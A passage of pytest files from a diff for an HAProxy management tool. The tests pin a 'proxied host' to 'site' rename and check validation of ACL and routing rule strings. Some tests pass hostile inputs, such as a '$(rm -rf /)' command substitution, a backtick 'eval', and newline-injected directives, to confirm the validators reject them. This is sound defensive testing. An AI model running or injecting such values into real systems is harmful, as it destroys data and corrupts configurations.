"Phase 4 regression: preview endpoint must declare its own "
"reserved-name set (decoupled from the create endpoint's "
"constant so the two can be moved independently to a shared "
"module later)."
)
assert "will be rejected at create time" in src, (
"Phase 4 regression: preview reserved-name warning must "
"explain that the wizard will REJECT this name at create "
"time so the operator knows the warning is actionable."
)
def test_preview_reserved_name_check_covers_both_entities():
"""Both frontend and backend names must be checked in preview
(manual parity — both manual `create_frontend` and
`create_backend` enforce this set)."""
src = _src()
# Slice the preview branch to avoid false positives from the
# create branch.
preview_start = src.find("warnings: List[str] = []")
create_start = src.find("Pre-create checks (must succeed before transaction)")
assert preview_start > 0 and create_start > preview_start
preview_slice = src[preview_start:create_start]
assert (
"body.frontend.name.lower() in _PREVIEW_RESERVED_NAMES" in preview_slice
), "Phase 4 regression: preview missing frontend reserved-name guard"
assert (
"body.backend.name.lower() in _PREVIEW_RESERVED_NAMES" in preview_slice
), "Phase 4 regression: preview missing backend reserved-name guard"
@@ -0,0 +1,577 @@
"""Phase B / D / F static-source pin tests for the post-rebrand
Site Wizard surface.
These tests exercise three orthogonal slices of the rename:
Phase B : API URL prefix moved from ``/api/proxied-hosts`` to
``/api/sites``; ``main.py`` exposes a hidden 308-redirect
alias so external integrators still pointing at the old
slug keep working.
Phase D : audit-log version-name shape moved from
``bulk-proxied-host-create-{ts}`` to
``bulk-site-create-{ts}``; ``cluster.py`` reject path
recognises BOTH prefixes (current + legacy) so historical
APPLIED versions still clean up.
Phase F : the Site Wizard now embeds the ``ACLRuleBuilder`` React
component used by the standalone Frontend Management page.
The wizard fetches cluster-scoped backends, lets the
operator define ACL / use_backend / redirect rules
visually, persists them in drafts, and injects the three
arrays into the create + preview payloads on submit.
All assertions are static source reads — they don't stand up the
FastAPI app or render React. The intent is to pin the *contract* so a
follow-up refactor that accidentally drops one of the rename branches
fails immediately at CI rather than silently shipping a regression.
"""
from __future__ import annotations
from pathlib import Path
import pytest
_BACK = Path(__file__).resolve().parent.parent
_FRONT = _BACK.parent / "frontend"
_SITE_ROUTER = _BACK / "routers" / "site_wizard.py"
_SITE_MODELS = _BACK / "models" / "site_wizard.py"
_MAIN = _BACK / "main.py"
_CLUSTER = _BACK / "routers" / "cluster.py"
_ACTIVITY = _BACK / "middleware" / "activity_logger.py"
# ---------------------------------------------------------------------------
# Phase A pin: module files exist under the new names AND the legacy
# proxied_host.py module path is gone — no backward-compat in source
# tree, only in URL slug + Pydantic alias.
# ---------------------------------------------------------------------------
def test_phase_a_module_files_renamed():
assert _SITE_ROUTER.is_file(), (
"Phase A regression: backend/routers/site_wizard.py is missing — "
"the wizard router file rename is the foundation of the whole "
"Site rebrand."
)
assert _SITE_MODELS.is_file(), (
"Phase A regression: backend/models/site_wizard.py is missing — "
"the wizard Pydantic models file rename is part of the Site "
"rebrand."
)
legacy_router = _BACK / "routers" / "proxied_host.py"
legacy_models = _BACK / "models" / "proxied_host.py"
assert not legacy_router.exists(), (
"Phase A regression: the legacy backend/routers/proxied_host.py "
"is back — the rename must remove the old file. Re-importing "
"from the legacy module would split the wizard surface into "
"two parallel routers."
)
assert not legacy_models.exists(), (
"Phase A regression: the legacy backend/models/proxied_host.py "
"is back — same divergence risk as the router file."
)
# ---------------------------------------------------------------------------
# Phase B pin: API URL prefix moved + 308 redirect alias preserved.
# ---------------------------------------------------------------------------
def test_phase_b_router_prefix_is_api_sites():
src = _SITE_ROUTER.read_text()
assert 'prefix="/api/sites"' in src, (
"Phase B regression: the wizard APIRouter prefix is no longer "
"/api/sites — the canonical URL has moved."
)
assert 'prefix="/api/proxied-hosts"' not in src, (
"Phase B regression: the legacy /api/proxied-hosts prefix has "
"been re-mounted on the primary router. The legacy slug must "
"live ONLY on the 308-redirect alias in main.py, otherwise "
"OpenAPI emits two parallel schemas and external integrators "
"see a confusing duplicate surface."
)
def test_phase_b_main_py_registers_legacy_redirect_alias():
src = _MAIN.read_text()
# Both the bare-root and the wildcard subpath alias must exist
# (POST /api/proxied-hosts and POST /api/proxied-hosts/preview etc.
# need separate handlers because FastAPI does not match `/path` and
# `/path/{rest}` with a single route).
assert '"/api/proxied-hosts"' in src, (
"Phase B regression: the legacy /api/proxied-hosts root alias "
"is missing from main.py — POST /api/proxied-hosts (bare) "
"would 404 instead of redirecting to /api/sites."
)
assert '"/api/proxied-hosts/{rest:path}"' in src, (
"Phase B regression: the legacy /api/proxied-hosts/* subpath "
"alias is missing from main.py — every legacy URL except the "
"bare root would 404."
)
assert "status_code=308" in src, (
"Phase B regression: the legacy alias must use 308 (Permanent "
"Redirect) so POST/PUT/DELETE preserve method + body. A 301 "
"or 302 would coerce POST → GET and break the create call."
)
assert "include_in_schema=False" in src, (
"Phase B regression: the legacy alias must be hidden from "
"OpenAPI so new consumers only see the canonical /api/sites "
"URLs."
)
# ---------------------------------------------------------------------------
# Phase B pin: activity_logger middleware short-circuits BOTH the new
# canonical slug AND the legacy slug for POST so the wizard owns its
# own audit row without the middleware producing a duplicate.
# ---------------------------------------------------------------------------
def test_phase_b_activity_logger_short_circuits_both_slugs():
src = _ACTIVITY.read_text()
assert "'/api/sites'" in src, (
"Phase B regression: activity_logger no longer recognises the "
"canonical /api/sites slug — wizard create POSTs would fall "
"through to the generic CRUD branch and produce a duplicate "
"audit row."
)
assert "'/api/proxied-hosts'" in src, (
"Phase B regression: activity_logger no longer recognises the "
"legacy /api/proxied-hosts slug — although the 308 redirect "
"intercepts it in practice, the safety-net entry must remain "
"to defend against any pre-redirect 2xx leak."
)
# ---------------------------------------------------------------------------
# Phase D pin: version-name shape moved + dual-prefix reject path.
# ---------------------------------------------------------------------------
def test_phase_d_router_emits_bulk_site_create_version_name():
src = _SITE_ROUTER.read_text()
assert 'version_name = f"bulk-site-create-{ts}"' in src, (
"Phase D regression: the wizard router no longer emits the "
"canonical bulk-site-create-{ts} version name — bulk-version "
"history would render the old proxied-host shape under the "
"new product name."
)
assert 'f"bulk-proxied-host-create-{ts}"' not in src, (
"Phase D regression: the wizard router is STILL emitting the "
"legacy bulk-proxied-host-create-{ts} name — operators see "
"two competing prefixes in Apply Management."
)
def test_phase_d_cluster_reject_recognises_both_prefixes():
src = _CLUSTER.read_text()
# `is_bulk_version` predicate AND `has_bulk_versions` probe — both
# branches must accept the current `bulk-site-create-` prefix.
assert src.count("'bulk-site-create-'") >= 2, (
"Phase D regression: cluster.py reject path no longer "
"recognises the canonical bulk-site-create- prefix in BOTH "
"branches (snapshot collect + has_bulk_versions probe). "
"Reject of newly-applied wizard versions would fall back to "
"the generic frontend/backend cleanup, which doesn't know "
"about the wizard's brand-new entities."
)
# Legacy prefix must STILL be wired into both branches so older
# APPLIED versions remain rejectable.
assert src.count("'bulk-proxied-host-create-'") >= 2, (
"Phase D regression: cluster.py reject path dropped the legacy "
"bulk-proxied-host-create- prefix in one or both branches. "
"Historical APPLIED versions created before this rename can "
"no longer be cleaned up cleanly."
)
def test_phase_d_router_action_name_is_wizard_create_site():
src = _SITE_ROUTER.read_text()
assert 'action="wizard_create_site"' in src, (
"Phase D regression: the wizard's explicit log_user_activity "
"no longer emits the post-rename `wizard_create_site` action "
"string — audit reports tracking wizard creates lose their "
"primary signal."
)
# ---------------------------------------------------------------------------
# Phase C pin: Pydantic classes renamed + module-level backward-compat
# aliases preserved.
# ---------------------------------------------------------------------------
def test_phase_c_pydantic_classes_renamed_with_aliases():
src = _SITE_MODELS.read_text()
# New canonical class names.
for new_class in (
"class SiteCreate(BaseModel):",
"class SitePreflightAcme(BaseModel):",
"class SiteDraftCreate(BaseModel):",
):
assert new_class in src, (
f"Phase C regression: canonical Pydantic class declaration "
f"`{new_class}` is missing — the rename to Site* did not "
"land."
)
# Backward-compat aliases — direct module-level references so
# OpenAPI does not see a second ghost schema.
for alias in (
"ProxiedHostCreate = SiteCreate",
"ProxiedHostPreflightAcme = SitePreflightAcme",
"ProxiedHostDraftCreate = SiteDraftCreate",
):
assert alias in src, (
f"Phase C regression: backward-compat alias `{alias}` is "
"missing — existing `from models.site_wizard import "
"ProxiedHostCreate` callers would fail with "
"ImportError."
)
# ---------------------------------------------------------------------------
# Phase E pin: frontend axios calls all point at /api/sites/* (not the
# legacy slug). The 308 alias would still work, but every wizard call
# would pay an extra round-trip — pin the canonical URL on the client.
# ---------------------------------------------------------------------------
def _front_or_skip(rel: str) -> str:
p = _FRONT / "src" / "components" / rel
if not p.exists():
pytest.skip(f"frontend tree not mounted ({rel})")
return p.read_text()
def test_phase_e_sitewizard_uses_api_sites():
src = _front_or_skip("SiteWizard.js")
for canonical in (
"axios.get('/api/sites/suggest'",
"axios.post('/api/sites/preflight-acme'",
"axios.post('/api/sites/preview'",
"axios.post('/api/sites'",
"axios.post('/api/sites/drafts'",
):
assert canonical in src, (
f"Phase E regression: SiteWizard.js no longer calls the "
f"canonical URL `{canonical}` — every wizard request "
"would hit the legacy /api/proxied-hosts slug and pay "
"an extra 308 round-trip."
)
# No raw legacy /api/proxied-hosts axios calls should remain on
# the primary code paths (comments are allowed).
suspicious = [
line for line in src.splitlines()
if "/api/proxied-hosts" in line and "//" not in line.split("/api/proxied-hosts")[0][-3:]
]
# Leave a generous tolerance for inline-template strings that
# embed the legacy slug for documentation.
assert len(suspicious) <= 1, (
"Phase E regression: SiteWizard.js still has axios calls to "
f"/api/proxied-hosts — found {len(suspicious)} non-comment "
"occurrences. The 308 alias should be the EXTERNAL fallback "
"only; the wizard itself must use the canonical slug."
)
def test_phase_e_sitedrafts_uses_api_sites():
src = _front_or_skip("SiteDrafts.js")
for canonical in (
"axios.get('/api/sites/drafts')",
"axios.post('/api/sites/preview'",
"/api/sites/drafts/${draft.id}",
):
assert canonical in src, (
f"Phase E regression: SiteDrafts.js no longer calls the "
f"canonical URL `{canonical}` — every drafts page request "
"would hit the legacy /api/proxied-hosts slug."
)
# ---------------------------------------------------------------------------
# Phase F pin: SiteWizard embeds ACLRuleBuilder, fetches cluster-scoped
# backends, persists ACL state in drafts, and injects the three rule
# arrays into the create + preview payloads on submit.
# ---------------------------------------------------------------------------
def test_phase_f_sitewizard_imports_acl_rule_builder():
src = _front_or_skip("SiteWizard.js")
assert "import ACLRuleBuilder from './ACLRuleBuilder'" in src, (
"Phase F regression: SiteWizard.js no longer imports the "
"ACLRuleBuilder component — the wizard's Routing & ACLs "
"section would render nothing."
)
def test_phase_f_sitewizard_renders_acl_rule_builder():
src = _front_or_skip("SiteWizard.js")
assert "<ACLRuleBuilder" in src, (
"Phase F regression: SiteWizard.js no longer mounts an "
"<ACLRuleBuilder /> JSX element on the Frontend step — the "
"operator falls back to the free-text textarea UX, which is "
"exactly what the rename was meant to fix."
)
# The builder must receive all three rule arrays plus the cluster
# backend list and an onChange callback.
for prop in (
"aclRules={aclBuilderData.aclRules}",
"useBackendRules={aclBuilderData.useBackendRules}",
"redirectRules={aclBuilderData.redirectRules}",
"backends={aclBuilderBackends}",
"onChange={(data) => setAclBuilderData(data)}",
):
assert prop in src, (
f"Phase F regression: SiteWizard.js <ACLRuleBuilder /> no "
f"longer wires the `{prop}` prop — the builder cannot "
"render or persist the operator's edits."
)
def test_phase_f_sitewizard_fetches_cluster_backends():
src = _front_or_skip("SiteWizard.js")
assert "axios.get('/api/backends'" in src, (
"Phase F regression: SiteWizard.js no longer fetches cluster-"
"scoped backends for the use_backend_rules dropdown — the "
"operator can only route ACLs to the wizard's brand-new "
"backend, which defeats the parity-with-FrontendManagement "
"intent."
)
assert "setClusterBackends" in src, (
"Phase F regression: SiteWizard.js no longer maintains a "
"clusterBackends state — the ACL builder dropdown would "
"always be empty."
)
def test_phase_f_sitewizard_injects_acl_into_create_payload():
src = _front_or_skip("SiteWizard.js")
# Submit handler must inject the three arrays under
# `frontend.acl_rules / use_backend_rules / redirect_rules` so the
# backend's FrontendStep validator accepts them.
create_block_idx = src.find("axios.post('/api/sites'")
assert create_block_idx != -1, "Phase F regression: create POST not found"
# Look back ~40 lines from the create call to the submit setup.
pre = src[max(0, create_block_idx - 4000): create_block_idx]
for required in (
"aclBuilderData.aclRules",
"aclBuilderData.useBackendRules",
"aclBuilderData.redirectRules",
"acl_rules:",
"use_backend_rules:",
"redirect_rules:",
):
assert required in pre, (
f"Phase F regression: handleSubmit no longer injects the "
f"`{required}` field into the wizard create payload — the "
"ACL rules typed in the builder would never reach the "
"backend."
)
def test_phase_f_sitewizard_injects_acl_into_preview_payload():
src = _front_or_skip("SiteWizard.js")
preview_idx = src.find("axios.post('/api/sites/preview'")
assert preview_idx != -1, "Phase F regression: preview POST not found"
pre = src[max(0, preview_idx - 1500): preview_idx]
for required in (
"aclBuilderData.aclRules",
"aclBuilderData.useBackendRules",
"aclBuilderData.redirectRules",
):
assert required in pre, (
f"Phase F regression: previewConfig no longer injects "
f"`{required}` into the preview payload — the diff "
"preview would NOT show the ACL/redirect lines the operator "
"just typed in the builder."
)
def test_phase_f_sitewizard_persists_acl_in_draft():
src = _front_or_skip("SiteWizard.js")
draft_idx = src.find("axios.post('/api/sites/drafts'")
assert draft_idx != -1, "Phase F regression: draft POST not found"
pre = src[max(0, draft_idx - 1500): draft_idx]
assert "aclBuilderData.aclRules" in pre, (
"Phase F regression: handleSaveDraft no longer persists the "
"ACL builder state — a resumed draft hydrates with empty "
"rules, the operator has to redo their routing config."
)
def test_phase_f_sitewizard_hydrates_acl_on_resume():
src = _front_or_skip("SiteWizard.js")
# The mount-only resume effect must hydrate aclBuilderData from
# the parsed payload's frontend.acl_rules / use_backend_rules /
# redirect_rules.
assert "resumedFE.acl_rules" in src or "parsed.frontend.acl_rules" in src or "(parsed && parsed.frontend) || {}" in src, (
"Phase F regression: SiteWizard.js no longer hydrates the "
"ACL builder from a resumed draft — the saved rules render "
"as if the operator never typed them."
)
assert "setAclBuilderKey" in src, (
"Phase F regression: SiteWizard.js no longer bumps the "
"ACL builder key on hydrate — a controlled-component cache "
"from the previous render keeps the empty arrays even after "
"setAclBuilderData."
)
# ---------------------------------------------------------------------------
# Phase I pin: DB-level Site rebrand — wizard_drafts.wizard_type DEFAULT
# moved from 'proxied_host' to 'site'; application code uses dual-value
# IN-list reads/deletes so pre-rename rows still surface; new INSERTs
# emit the canonical 'site' value.
# ---------------------------------------------------------------------------
def test_phase_i_migration_alters_wizard_drafts_default_to_site():
src = (_BACK / "database" / "migrations.py").read_text()
# Idempotent ALTER … SET DEFAULT 'site'. Match either single or
# double-quoted SQL string literal forms a fmtter might produce.
import re as _re
assert _re.search(
r"ALTER\s+TABLE\s+wizard_drafts\s+ALTER\s+COLUMN\s+wizard_type\s+SET\s+DEFAULT\s+'site'",
src,
), (
"Phase I regression: migrations.py no longer issues the "
"ALTER TABLE wizard_drafts ALTER COLUMN wizard_type SET "
"DEFAULT 'site' statement — fresh installs would still get "
"the old 'proxied_host' default and emit pre-rebrand rows."
)
# The CREATE TABLE branch (taken on truly-fresh installs where
# the table does not exist yet) must already declare the new
# default so we don't depend on the ALTER pass for first-deploys.
assert "DEFAULT 'site'" in src, (
"Phase I regression: wizard_drafts CREATE TABLE no longer "
"declares wizard_type DEFAULT 'site'. First-deploy "
"installations would still create the column with the old "
"default."
)
# And the legacy default must NOT appear inside the live CREATE
# TABLE statement anymore (matching only the comment-prose
# mention is fine — the failure mode we're guarding against is a
# regression that re-introduces the old default in CREATE).
create_block_idx = src.find("CREATE TABLE wizard_drafts")
assert create_block_idx != -1, (
"Phase I regression: CREATE TABLE wizard_drafts not found"
)
create_block = src[create_block_idx: create_block_idx + 2000]
assert "DEFAULT 'proxied_host'" not in create_block, (
"Phase I regression: CREATE TABLE wizard_drafts still "
"declares the legacy `wizard_type … DEFAULT 'proxied_host'` "
"— the DEFAULT migration would do nothing on first-deploy."
)
def test_phase_i_router_dual_filter_on_drafts_select_and_count():
src = _SITE_ROUTER.read_text()
# The 50-draft cap query AND the list_drafts SELECT must use the
# dual-value IN-list so pre-rebrand drafts are counted/listed.
assert src.count("wizard_type IN ('site', 'proxied_host')") >= 2, (
"Phase I regression: the wizard router no longer issues a "
"dual-value IN-list filter on wizard_type — pre-rebrand "
"drafts (wizard_type='proxied_host') would be invisible to "
"their owner after the rename, both in the listing and the "
"50-draft cap."
)
# New INSERT emits the canonical 'site' value (legacy literal
# must NOT appear in the INSERT statement anymore).
insert_idx = src.find("INSERT INTO wizard_drafts")
assert insert_idx != -1, (
"Phase I regression: INSERT INTO wizard_drafts not found"
)
insert_block = src[insert_idx: insert_idx + 800]
assert "VALUES ($1, 'site'" in insert_block, (
"Phase I regression: the wizard INSERT no longer emits the "
"canonical 'site' value — new drafts would still be tagged "
"with the legacy 'proxied_host' value, defeating the rename."
)
assert "'proxied_host'" not in insert_block, (
"Phase I regression: the wizard INSERT still references the "
"legacy 'proxied_host' literal — should be 'site' post-Phase-I."
)
def test_phase_i_cluster_delete_dual_filter_for_drafts_purge():
src = _CLUSTER.read_text()
assert "wizard_type IN ('site', 'proxied_host')" in src, (
"Phase I regression: cluster.py delete handler no longer "
"purges BOTH legacy `proxied_host` and post-rebrand `site` "
"drafts whose payload pointed at the deleted cluster — "
"pre-rename orphans would linger until the 30-day TTL fires."
)
def test_phase_i_rate_limit_dual_aliases_legacy_action_name():
"""Phase I Audit Loop #1 finding: the wizard's per-user-per-minute
rate-limit COUNT(*) over user_activity_logs used to filter on the
legacy `proxied_host_acme_preflight` action_name. Phase D
activity_logger middleware now emits `site_acme_preflight` for
the same endpoint, so a single-name filter was effectively
counting nothing — the limit was bypassed.
Pin the dual-name behaviour: the helper accepts a canonical
`site_*` action and auto-aliases the legacy `proxied_host_*`
companion so a deploy mid-minute cannot reset the quota.
"""
src = _SITE_ROUTER.read_text()
# ANY($2::text[]) signals an array-valued IN-list parameter.
assert "ANY($2::text[])" in src, (
"Phase I regression: _enforce_rate_limit no longer issues "
"an ANY(::text[]) lookup — it likely degraded back to the "
"single-action_name filter that the Phase D activity_logger "
"rename silently bypassed."
)
# The auto-alias derivation must derive the legacy
# `proxied_host_*` name from the canonical `site_*` input.
assert "proxied_host_" in src and "site_" in src, (
"Phase I regression: _enforce_rate_limit auto-alias logic "
"no longer derives the legacy proxied_host_* companion from "
"the canonical site_* action — pre-rename log rows are "
"uncounted."
)
# Caller emits the canonical name (post-rebrand).
assert '"site_acme_preflight"' in src, (
"Phase I regression: preflight call site no longer passes "
'the canonical "site_acme_preflight" action — should match '
"activity_logger's middleware-emitted action."
)
def test_phase_i_resource_type_emit_is_site():
src = _SITE_ROUTER.read_text()
# The wizard's explicit log_user_activity call must emit
# `resource_type='site'` so newly-created audit rows are
# consistent with activity_logger's new 'site' resource type
# for the same path.
assert 'resource_type="site"' in src, (
"Phase I regression: the wizard's log_user_activity no "
"longer emits resource_type='site' — new audit rows would "
"still carry the legacy 'proxied_host' resource_type and "
"diverge from activity_logger's middleware-emitted rows."
)
assert 'resource_type="proxied_host"' not in src, (
"Phase I regression: the wizard router still emits "
"resource_type='proxied_host' somewhere — should be 'site' "
"post-Phase-I."
)
def test_phase_f_sitewizard_blocks_https_redirect_with_redirect_rules():
src = _front_or_skip("SiteWizard.js")
# The submit handler must short-circuit when https_redirect is on
# AND redirectRules is non-empty (FrontendStep validator catches
# this with a 422; surfacing earlier is friendlier UX).
assert "https_redirect" in src and "redirectRules.length" in src, (
"Phase F regression: SiteWizard.js no longer pre-validates "
"the mutually-exclusive https_redirect ⊕ redirect_rules "
"combination — the operator clicks Submit, waits for a "
"round-trip, then sees an opaque 422."
)
assert "mutually exclusive" in src or "cannot be combined" in src, (
"Phase F regression: the https_redirect / redirect_rules "
"guard message is missing or off-vocabulary — the operator "
"won't know why the wizard refused to submit."
)
+537
View File
@@ -0,0 +1,537 @@
"""Phase K — Site Wizard validation hardening (Phase A pins).
These pins lock the contract / safety / cross-field decisions made in
Phase A of the Site Wizard validation hardening + UX simplification
plan. They are deliberately model-level (not endpoint-level) so the
Pydantic invariant survives any future router refactor without an HTTP
client harness.
Background
----------
Before Phase A:
* `FrontendStep.acl_rules` was typed `List[dict]` while
`frontend/src/components/ACLRuleBuilder.js::serializeAclRule`
emitted `string`. Every wizard POST containing a single ACL rule
failed Pydantic validation with
body -> frontend -> acl_rules -> 0:
Input should be a valid dictionary
Same for `use_backend_rules`. The tool was effectively unusable
for any non-trivial site.
* `FrontendStep` did not catch `mode='tcp' + https_redirect=true`.
The renderer would silently emit an HTTP-only directive into a
TCP frontend and the agent's `haproxy -c` would reject the
config only at apply time.
* `SSLChoice` did not catch `ssl_min_ver > ssl_max_ver`. HAProxy
accepted the syntax but every TLS handshake failed at runtime.
After Phase A:
* `acl_rules: List[str]`, `use_backend_rules: List[str]` (manual API
parity at `backend/models/frontend.py::validate_acl_rules`).
* `redirect_rules: List[Union[str, dict]]` — kept heterogeneous on
purpose so the structured-redirect path
(`services/haproxy_config.py::_format_redirect_rule`) keeps
working for any historical caller.
* Every rule string is bounded (4 KB), newline-free, danger-pattern
free, non-empty after `.strip()`. Mirrors the manual frontend
API's pre-existing security posture.
* `FrontendStep.reject_tcp_mode_with_https_redirect` and
`SSLChoice.reject_inverted_tls_versions` close two silent-bug
gaps surfaced by the audit.
"""
import pytest
from pydantic import ValidationError
from models.site_wizard import FrontendStep, SSLChoice
def _frontend_kwargs(**overrides):
"""Minimal valid FrontendStep kwargs."""
base = dict(name="fe_http", mode="http", bind_port=80)
base.update(overrides)
return base
# ─────────────────────────────────────────────────────────────────────
# Phase K-A1 — acl_rules contract + safety validators
# ─────────────────────────────────────────────────────────────────────
def test_phase_k_frontend_step_acl_rules_is_list_str_with_safety_validators():
"""Phase A: acl_rules accepts string list + rejects every known
unsafe shape (dict, newline injection, danger pattern, oversize)."""
fe = FrontendStep(**_frontend_kwargs(acl_rules=["is_api path_beg /api"]))
assert fe.acl_rules == ["is_api path_beg /api"]
with pytest.raises(ValidationError, match="must be HAProxy directive strings"):
FrontendStep(**_frontend_kwargs(acl_rules=[{"raw": "is_api path_beg /api"}]))
with pytest.raises(ValidationError, match="line breaks"):
FrontendStep(
**_frontend_kwargs(acl_rules=["is_api path_beg /api\nglobal\n daemon"])
)
with pytest.raises(ValidationError, match="dangerous content"):
FrontendStep(
**_frontend_kwargs(acl_rules=["is_evil path_beg $(rm -rf /)"])
)
with pytest.raises(ValidationError, match="exceeds 4096 characters"):
FrontendStep(**_frontend_kwargs(acl_rules=["a " * 3000]))
def test_phase_k_frontend_step_use_backend_rules_is_list_str_with_safety_validators():
"""Same matrix as ACL — use_backend_rules has the same contract
because `routers/backend.py:1281-1298` substring-matches against
these strings to clean up after a backend deletion."""
fe = FrontendStep(
**_frontend_kwargs(use_backend_rules=["api_be if is_api"])
)
assert fe.use_backend_rules == ["api_be if is_api"]
with pytest.raises(ValidationError, match="must be HAProxy directive strings"):
FrontendStep(
**_frontend_kwargs(use_backend_rules=[{"backend": "api_be"}])
)
with pytest.raises(ValidationError, match="line breaks"):
FrontendStep(
**_frontend_kwargs(use_backend_rules=["api_be if is_api\nbackend foo"])
)
with pytest.raises(ValidationError, match="dangerous content"):
FrontendStep(
**_frontend_kwargs(use_backend_rules=["api_be if `eval x`"])
)
with pytest.raises(ValidationError, match="exceeds 4096 characters"):
FrontendStep(**_frontend_kwargs(use_backend_rules=["x " * 3000]))
# ─────────────────────────────────────────────────────────────────────
# Phase K-A2 — redirect_rules deliberate heterogeneity
# ─────────────────────────────────────────────────────────────────────
def test_phase_k_frontend_step_redirect_rules_accepts_string_or_dict():
"""`redirect_rules` stays `List[Union[str, dict]]` because the
renderer at `services/haproxy_config.py::_format_redirect_rule`
deliberately accepts both shapes. Forcing string-only would
silently break the structured-redirect path."""
fe_str = FrontendStep(
**_frontend_kwargs(redirect_rules=["scheme https if !{ ssl_fc }"])
)
assert fe_str.redirect_rules == ["scheme https if !{ ssl_fc }"]
fe_dict = FrontendStep(
**_frontend_kwargs(redirect_rules=[{"scheme": "https", "code": 301}])
)
assert fe_dict.redirect_rules == [{"scheme": "https", "code": 301}]
fe_mixed = FrontendStep(
**_frontend_kwargs(
redirect_rules=[
"scheme https if !{ ssl_fc }",
{"scheme": "https", "code": 301},
]
)
)
assert len(fe_mixed.redirect_rules) == 2
with pytest.raises(ValidationError, match="HAProxy directive strings or"):
FrontendStep(**_frontend_kwargs(redirect_rules=[42]))
# ─────────────────────────────────────────────────────────────────────
# Phase K-A3 — empty / whitespace rule reject (would render as
# `acl ` / `use_backend ` and fail haproxy -c)
# ─────────────────────────────────────────────────────────────────────
def test_phase_k_frontend_step_rejects_empty_string_rule_element():
"""Empty / whitespace-only rule strings are rejected at validation
time on every rule field — they would otherwise render as bare
`acl ` / `use_backend ` lines that fail `haproxy -c`."""
for field in ("acl_rules", "use_backend_rules"):
with pytest.raises(ValidationError, match="empty / whitespace-only"):
FrontendStep(**_frontend_kwargs(**{field: [""]}))
with pytest.raises(ValidationError, match="empty / whitespace-only"):
FrontendStep(**_frontend_kwargs(**{field: [" "]}))
with pytest.raises(ValidationError, match="empty / whitespace-only"):
FrontendStep(**_frontend_kwargs(redirect_rules=[""]))
with pytest.raises(ValidationError, match="empty / whitespace-only"):
FrontendStep(**_frontend_kwargs(redirect_rules=[" "]))
# ─────────────────────────────────────────────────────────────────────
# Phase K-A4 — TCP-mode + https_redirect cross-field validator
# ─────────────────────────────────────────────────────────────────────
def test_phase_k_frontend_step_rejects_tcp_mode_with_https_redirect():
"""`mode='tcp' + https_redirect=true` was a silent bug — the
renderer emits an HTTP-only directive into a TCP frontend and
the agent's `haproxy -c` rejects it only at apply time. Phase A
rejects it at the wizard boundary."""
with pytest.raises(
ValidationError,
match="frontend.mode='tcp' is incompatible with frontend.https_redirect",
):
FrontendStep(**_frontend_kwargs(mode="tcp", https_redirect=True))
fe_http = FrontendStep(**_frontend_kwargs(mode="http", https_redirect=True))
assert fe_http.https_redirect is True
fe_tcp = FrontendStep(**_frontend_kwargs(mode="tcp", https_redirect=False))
assert fe_tcp.https_redirect is False
# ─────────────────────────────────────────────────────────────────────
# Phase K-A5 — TLS min/max inversion validator on SSLChoice
# ─────────────────────────────────────────────────────────────────────
def test_phase_k_sslchoice_rejects_inverted_tls_versions():
"""`ssl_min_ver > ssl_max_ver` produces a bind that accepts no TLS
handshakes at runtime — surface the contradiction at the wizard
boundary instead of in production."""
with pytest.raises(
ValidationError,
match="cannot be greater than ssl.ssl_max_ver",
):
SSLChoice(mode="none", ssl_min_ver="TLSv1.3", ssl_max_ver="TLSv1.2")
ssl_ok = SSLChoice(mode="none", ssl_min_ver="TLSv1.2", ssl_max_ver="TLSv1.3")
assert ssl_ok.ssl_min_ver == "TLSv1.2"
assert ssl_ok.ssl_max_ver == "TLSv1.3"
ssl_equal = SSLChoice(mode="none", ssl_min_ver="TLSv1.2", ssl_max_ver="TLSv1.2")
assert ssl_equal.ssl_min_ver == "TLSv1.2"
assert ssl_equal.ssl_max_ver == "TLSv1.2"
ssl_one_set = SSLChoice(mode="none", ssl_min_ver="TLSv1.2")
assert ssl_one_set.ssl_min_ver == "TLSv1.2"
assert ssl_one_set.ssl_max_ver is None
# ─────────────────────────────────────────────────────────────────────
# Phase K-C — shared synthesis helper + dry-run preview behaviour
# ─────────────────────────────────────────────────────────────────────
def _site_payload(**overrides):
"""Minimal valid SiteCreate payload for synthesis tests."""
from models.site_wizard import SiteCreate
base = {
"cluster_id": 1,
"domains": ["www.example.com"],
"backend": {"name": "be"},
"servers": [{
"server_name": "s1",
"server_address": "10.0.0.1",
"server_port": 80,
}],
"frontend": {"name": "fe", "bind_port": 80},
"ssl": {"mode": "none"},
}
base.update(overrides)
return SiteCreate(**base)
def test_phase_k_create_site_and_preview_use_same_synthesis_helper():
"""Phase K Phase C — both `create_site` and the dry-run preview
path must route through `_synthesize_candidate_haproxy_config`.
A static-source pin keeps a future refactor from quietly
inlining the call on one side and breaking parity between the
apply gate and the dry-run gate.
The helper is intentionally two-mode:
* `entities_already_inserted=True` for `create_site` (the
wizard's INSERTs are already in the active transaction so
the renderer sees them).
* `entities_already_inserted=False` for the preview dry-run
(no DB writes happen — we render the current cluster + a
candidate fragment).
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
body = src.read_text()
assert "_synthesize_candidate_haproxy_config" in body, (
"Phase K Phase C regression: routers/site_wizard.py no "
"longer defines `_synthesize_candidate_haproxy_config`."
)
assert body.count("_synthesize_candidate_haproxy_config(") >= 3, (
"Phase K Phase C regression: the helper is no longer "
"called from BOTH create_site (entities_already_inserted=True) "
"and preview_create (entities_already_inserted=False). "
"Without two callsites the dry-run gate and the apply gate "
"can desync silently."
)
assert "entities_already_inserted=True" in body, (
"Phase K Phase C regression: create_site no longer passes "
"entities_already_inserted=True. Without it the helper "
"would re-render the candidate fragment on top of the "
"post-insert config, producing duplicate frontend / "
"backend sections in the persisted version."
)
assert "entities_already_inserted=False" in body, (
"Phase K Phase C regression: the preview dry-run no longer "
"passes entities_already_inserted=False. Without the "
"candidate-fragment append, the validator would only see "
"the cluster's CURRENT config and miss every wizard-input "
"induced error."
)
def test_phase_k_synthesis_helper_acme_mode_omits_https_frontend():
"""Phase K Phase C — when `ssl.mode='acme'` the synthesizer
must NOT emit a `bind … ssl crt …` directive in the candidate
fragment. ACME's HTTPS frontend is created post-completion
inside the LE callback (see `routers/letsencrypt.py:1012-1014`)
— surfacing a synthetic HTTPS bind here would produce false-
positive errors about a missing crt path.
"""
from routers.site_wizard import _build_candidate_fragment
acme_payload = _site_payload(
ssl={"mode": "acme"},
apply_immediately=True,
frontend={"name": "fe", "bind_port": 80, "mode": "http"},
)
fragment = _build_candidate_fragment(acme_payload)
assert "frontend fe" in fragment, "HTTP frontend must still render in ACME mode"
assert "backend be" in fragment, "backend must still render in ACME mode"
assert "ssl crt" not in fragment, (
